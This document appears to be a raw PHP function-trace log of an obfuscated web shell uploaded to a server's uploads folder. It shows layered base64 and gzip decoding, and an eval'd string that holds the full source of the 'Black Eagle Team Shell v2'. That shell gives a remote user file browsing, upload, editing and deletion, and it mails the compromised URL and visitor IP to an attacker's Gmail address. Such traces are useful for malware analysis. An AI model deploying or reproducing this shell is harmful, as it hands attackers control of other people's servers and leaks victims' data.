3	9	0	0.000494	405048	base64_decode	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
3	9	1	0.000531	409176
3	9	R			'\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
3	10	0	0.000630	405048	gzinflate	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
3	10	1	0.000733	408152
3	10	R			'\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
3	11	0	0.000831	404024	gzinflate	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
3	11	1	0.000926	407128
3	11	R			'\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
3	12	0	0.001023	404024	gzinflate	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
3	12	1	0.001116	407128
3	12	R			'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
3	13	0	0.001224	404024	gzuncompress	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
3	13	1	0.001320	407128
3	13	R			'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
3	14	0	0.001420	404024	gzuncompress	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
3	14	1	0.001559	416344
3	14	R			'<?php\r\n/*\r\n    Black Eagle Team Shell v2\r\n    By : Bo0G3yM4n\r\n    Thanks To : Black Eagle Team, Dark Clown Security\r\n    Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname       = "Black Eagle Team" . " Minishell";\r\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\'
3	15	0	0.001874	471576	eval	1	'?><?php\r\n/*\r\n    Black Eagle Team Shell v2\r\n    By : Bo0G3yM4n\r\n    Thanks To : Black Eagle Team, Dark Clown Security\r\n    Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname       = "Black Eagle Team" . " Minishell";\r\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir     = "\\x72\\x6d\\x64" . "ir";\r\n$un__link    = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\nif (get_magic_quotes_gpc()) {\r\n    foreach ($_POST as $key => $value) {\r\n        $_POST[$key] = stripslashes($value);\r\n    }\r\n}\r\necho \'<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<meta name="robots" content"noindex. nofollow">\r\n<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">\r\n<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">\r\n<title>\'.$sname.\'</title>\r\n<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\r\n<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body>\';\r\necho \'<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>\' . $sname . 
\'</center></h1></div>\';\r\nif (isset($_GET[\'path\'])) {\r\n    $path = $_GET[\'path\'];\r\n    chdir($_GET[\'path\']);\r\n} else {\r\n    $path = $__gcdir();\r\n}\r\n$path  = str_replace("\\\\", "/", $path);\r\n$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';\r\necho "<font style=\'font-size:13px;\'>Path: ";\r\nforeach ($paths as $id => $pat) {\r\n    echo "<a style=\'font-size:13px;\' href=\'?path=";\r\n    for ($i = 0; $i <= $id; $i++) {\r\n        echo $paths[$i];\r\n        if ($i != $id) {\r\n            echo "/";\r\n        }\r\n    }\r\n    echo "\'>$pat</a>/";\r\n}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif (isset($_FILES[\'file\'])) {\r\n    if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {\r\n        echo \'<center><font color="#00ff00">Upload Berhasil!!</font></center><br/>\';\r\n    } else {\r\n        echo \'<center><font color="red">Upload Gagal!!</font></center><br/>\';\r\n    }\r\n}\r\necho \'</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">\';\r\necho \'\';\r\nif (isset($_GET[\'filesrc\'])) {\r\n    echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';\r\n    echo "" . basename($_GET[\'filesrc\']);\r\n    ""; \r\n    echo \'</tr></td></table><br />\';\r\n    echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");\r\n} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {\r\n    echo \'</table><br /><center>\' . $_POST[\'path\'] . 
\'<br /><br />\';\r\n    if ($_POST[\'opt\'] == \'rename\') {\r\n        if (isset($_POST[\'newname\'])) {\r\n            if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {\r\n                echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n            }\r\n            $_POST[\'name\'] = $_POST[\'newname\'];\r\n        }\r\n        echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>\';\r\n    } elseif ($_POST[\'opt\'] == \'edit\') {\r\n        if (isset($_POST[\'src\'])) {\r\n            $fp = fopen($_POST[\'path\'], \'w\');\r\n            if (fwrite($fp, $_POST[\'src\'])) {\r\n                echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';\r\n            }\r\n            fclose($fp);\r\n        }\r\n        echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . 
\'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>\';\r\n    }\r\n    echo \'</center>\';\r\n} else {\r\n    echo \'</table><br /><center>\';\r\n    if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {\r\n        if ($_POST[\'type\'] == \'dir\') {\r\n            if ($rm__dir($_POST[\'path\'])) {\r\n                echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';\r\n            }\r\n        } elseif ($_POST[\'type\'] == \'file\') {\r\n            if ($un__link($_POST[\'path\'])) {\r\n                echo \'<font color="#00ff00">Delete File Done.</font><br />\';\r\n            } else {\r\n                echo \'<font color="red">Delete File Error.</font><br />\';\r\n            }\r\n        }\r\n    }\r\n    echo \'</center>\';\r\n    $_scdir = $__scdir($path);\r\n    echo \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\n    foreach ($_scdir as $dir) {\r\n        if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')\r\n            continue;\r\n        echo "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\n        if (is_writable("$path/$dir"))\r\n            echo \'<font color="#00ff00">\';\r\n        elseif (!is_readable("$path/$dir"))\r\n            echo \'<font color="red">\';\r\n        echo perms("$path/$dir");\r\n        if (is_writable("$path/$dir") || !is_readable("$path/$dir"))\r\n            echo \'</font>\';\r\n        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . 
"";\r\n        echo "</center></td> <td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">&nbsp;<input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n    }\r\n    foreach ($_scdir as $file) {\r\n        if (!is_file("$path/$file"))\r\n            continue;\r\n        $size = filesize("$path/$file") / 1024;\r\n        $size = round($size, 3);\r\n        if ($size >= 1024) {\r\n            $size = round($size / 1024, 2) . \' MB\';\r\n        } else {\r\n            $size = $size . \' KB\';\r\n        }\r\n        echo "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>" . $size . "</center></td><td><center>";\r\n        if (is_writable("$path/$file"))\r\n            echo \'<font color="#00ff00">\';\r\n        elseif (!is_readable("$path/$file"))\r\n            echo \'<font color="red">\';\r\n        echo perms("$path/$file");\r\n        if (is_writable("$path/$file") || !is_readable("$path/$file"))\r\n            echo \'</font>\';\r\n        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . 
"";\r\n        echo "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">&nbsp;<input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n    }\r\n    echo \'</table></div>\';\r\n}\r\nfunction perms($file)\r\n{\r\n    $perms = fileperms($file);\r\n    if (($perms & 0xC000) == 0xC000) {\r\n        $info = \'s\';\r\n    } elseif (($perms & 0xA000) == 0xA000) {\r\n        $info = \'l\';\r\n    } elseif (($perms & 0x8000) == 0x8000) {\r\n        $info = \'-\';\r\n    } elseif (($perms & 0x6000) == 0x6000) {\r\n        $info = \'b\';\r\n    } elseif (($perms & 0x4000) == 0x4000) {\r\n        $info = \'d\';\r\n    } elseif (($perms & 0x2000) == 0x2000) {\r\n        $info = \'c\';\r\n    } elseif (($perms & 0x1000) == 0x1000) {\r\n        $info = \'p\';\r\n    } else {\r\n        $info = \'u\';\r\n    }\r\n    $info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));\r\n    $info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));\r\n    $info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? 
\'T\' : \'-\'));\r\n    return $info;\r\n}\r\necho \'<br><center>&copy; <span id="footer"></span> 2020 Black Eagle Team</center><br>\';\r\necho \'</body></html><!-- EOF -->\';\r\n?>\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$to = \'alfredofernandezbutar@gmail.com\';\r\n$f31337 = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$fie = "Akses $f31337 :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>'	/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	0
4	16	0	0.002090	471576	set_time_limit	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	9	1	0
4	16	1	0.002109	471640
4	16	R			FALSE
4	17	0	0.002124	471608	error_reporting	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	10	1	0
4	17	1	0.002139	471648
4	17	R			22527
4	18	0	0.002153	471608	error_log	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	11	1	0
4	18	1	0.002182	471640
4	18	R			TRUE
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	12	$sname = 'Black Eagle Team Minishell'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	13	$__gcdir = 'getcwd'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	14	$__fgetcon7s = 'file_get_contents'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	15	$__scdir = 'scandir'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	16	$rm__dir = 'rmdir'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	17	$un__link = 'unlink'
4	19	0	0.002268	471608	get_magic_quotes_gpc	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	18	0
4	19	1	0.002282	471608
4	19	R			FALSE
4	20	0	0.002298	471608	getcwd	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	39	0
4	20	1	0.002313	471656
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	39	$path = '/var/www/html/uploads'
4	21	0	0.002340	471656	str_replace	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	41	3	'\\'	'/'	'/var/www/html/uploads'
4	21	1	0.002357	471752
4	21	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	41	$path = '/var/www/html/uploads'
4	22	0	0.002382	471656	explode	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	42	2	'/'	'/var/www/html/uploads'
4	22	1	0.002398	472232
4	22	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	42	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 1
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 2
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 3
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 4
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
4	23	0	0.002677	472160	scandir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	114	1	'/var/www/html/uploads'
4	23	1	0.002714	472784
4	23	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'userzero.phtml']
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	114	$_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'userzero.phtml']
4	24	0	0.002755	472800	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/.'
4	24	1	0.002773	472864
4	24	R			TRUE
4	25	0	0.002788	472832	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/..'
4	25	1	0.002804	472880
4	25	R			TRUE
4	26	0	0.002818	472840	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/.htaccess'
4	26	1	0.002834	472880
4	26	R			FALSE
4	27	0	0.002847	472840	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/data'
4	27	1	0.002863	472880
4	27	R			TRUE
4	28	0	0.002877	472840	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	120	1	'/var/www/html/uploads/data'
4	28	1	0.002896	472880
4	28	R			TRUE
4	29	0	0.002910	472840	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	124	1	'/var/www/html/uploads/data'
5	30	0	0.002924	472840	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/data'
5	30	1	0.002939	472880
5	30	R			16895
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 16895
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	165	$info = 'd'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= 'w'
